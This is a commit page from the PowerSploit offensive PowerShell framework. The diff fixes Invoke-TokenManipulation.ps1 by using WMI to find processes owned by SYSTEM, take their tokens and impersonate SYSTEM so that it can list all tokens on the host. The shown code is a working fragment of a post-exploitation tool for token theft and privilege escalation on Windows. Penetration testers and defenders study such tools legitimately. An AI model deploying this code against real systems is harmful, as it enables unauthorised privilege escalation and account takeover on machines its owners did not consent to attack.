diff options
| author | Matt Graeber <matt@exploit-monday.com> | 2016-03-10 16:48:37 -0800 |
|---|---|---|
| committer | Matt Graeber <matt@exploit-monday.com> | 2016-03-10 16:48:37 -0800 |
| commit | f305e31cf56ced7941ccbd7864a3f372037dc91c (patch) | |
| tree | 399b7f36de45838279df8428b68a7b91fcd4650c | |
| parent | 2e1d49db33cdbef6c11c9723f6d4731e5875c803 (diff) | |
| download | PowerSploit-f305e31cf56ced7941ccbd7864a3f372037dc91c.tar.gz PowerSploit-f305e31cf56ced7941ccbd7864a3f372037dc91c.zip | |
Bugfix: Invoke-TokenManipulation. Issue #112
Fixed the PSv4 dependency for obtaining process ownership information.
Thanks to @mmashwani for suggesting the WMI solution.
| -rw-r--r-- | Exfiltration/Invoke-TokenManipulation.ps1 | 25 |
1 files changed, 19 insertions, 6 deletions
diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1 index ea30952..6558a63 100644 --- a/Exfiltration/Invoke-TokenManipulation.ps1 +++ b/Exfiltration/Invoke-TokenManipulation.ps1 @@ -1686,20 +1686,33 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges. #We need to enumrate all processes running as SYSTEM and find one that we can use. [string]$LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value - $SystemTokens = Get-Process -IncludeUserName | Where {$_.Username -eq $LocalSystemNTAccount} + + $SystemTokens = Get-WmiObject -Class Win32_Process | ForEach-Object { + $OwnerInfo = $_.GetOwner() + + if ($OwnerInfo.Domain -and $OwnerInfo.User) { + $OwnerString = "$($OwnerInfo.Domain)\$($OwnerInfo.User)".ToUpper() + + if ($OwnerString -eq $LocalSystemNTAccount.ToUpper()) { + $_ + } + } + } + ForEach ($SystemToken in $SystemTokens) { - $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.Id -WarningAction SilentlyContinue -ErrorAction SilentlyContinue + $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.ProcessId -WarningAction SilentlyContinue -ErrorAction SilentlyContinue + if ($SystemTokenInfo) { break } } - if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken))) + if ($SystemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken))) { Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens" } - if ($systemTokenInfo -ne $null -and $systemTokenInfo.hProcToken -ne [IntPtr]::Zero) + if ($SystemTokenInfo -ne $null -and $SystemTokenInfo.hProcToken -ne [IntPtr]::Zero) { - $CloseHandle.Invoke($systemTokenInfo.hProcToken) | Out-Null - $systemTokenInfo = $null + $CloseHandle.Invoke($SystemTokenInfo.hProcToken) | Out-Null + $SystemTokenInfo = $null } $ProcessIds = get-process | where {$_.name -inotmatch "^csrss$" -and $_.name -inotmatch "^system$" -and $_.id -ne 0} |